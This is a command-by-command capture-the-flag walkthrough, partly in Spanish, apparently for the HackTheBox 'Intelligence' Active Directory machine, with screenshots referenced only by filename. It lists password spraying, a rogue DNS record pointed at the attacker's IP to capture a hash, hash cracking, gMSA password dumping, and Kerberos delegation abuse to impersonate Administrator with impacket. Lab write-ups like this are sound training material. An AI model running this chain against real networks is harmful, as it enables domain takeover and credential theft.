echo "10.129.95.154  intelligence.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA intelligence 10.129.95.154 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210716062727.png

nmap -sC -sV -O -p- -oA intelligence 10.129.95.154

nmap -sU -O -p- -oA intelligence-udp 10.129.95.154

nikto -h 10.129.95.154:80

gobuster dir -k -u http://10.129.95.154/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210716062455.png

strings 2020-01-01-upload.pdf

Pasted image 20210716062932.png

Pasted image 20210716064007.png

cat users

Pasted image 20210716070001.png

Encontramos la contrasena de NewIntelligenceCorpUser9876

Pasted image 20210716065514.png

crackmapexec smb 10.129.95.154 -u users -p NewIntelligenceCorpUser9876

Pasted image 20210716070221.png

smbclient -L 10.129.95.154/ -U Tiffany.Molina

Pasted image 20210716070457.png

smbclient -L //10.129.95.154/ -U Tiffany.Molina

smbclient //10.129.95.154/IT -U Tiffany.Molina

Pasted image 20210716071602.png

cat downdetector.ps1

Pasted image 20210716071719.png

Tenemos que registrar nuestro dominio falso para tener acceso a root. Vemos el usuario Ted Graves.

python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -r webfake.intelligence.htb --data 10.10.14.94 10.129.95.154

Pasted image 20210716073523.png

hashid intelligence_hash.txt

Pasted image 20210716075309.png

john --wordlist=/usr/share/wordlists/rockyou.txt intelligence_hash.txt

Pasted image 20210716075703.png

hashcat -a 3 -m 5600 intelligence_hast.txt /usr/share/wordlists/rockyou.txt --show

Pasted image 20210716075855.png

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

Pasted image 20210716080634.png

python3 /opt/impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83... -impersonate administrator

Pasted image 20210716081100.png

python3 /opt/impacket/examples/atexec.py -k -no-pass dc.intelligence.htb -hashes 'whoami'

Pasted image 20210716081438.png

python3 /opt/impacket/examples/smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass

Pasted image 20210724064023.png

boxes

copyright©2022 Cu3rv0x all rights reserved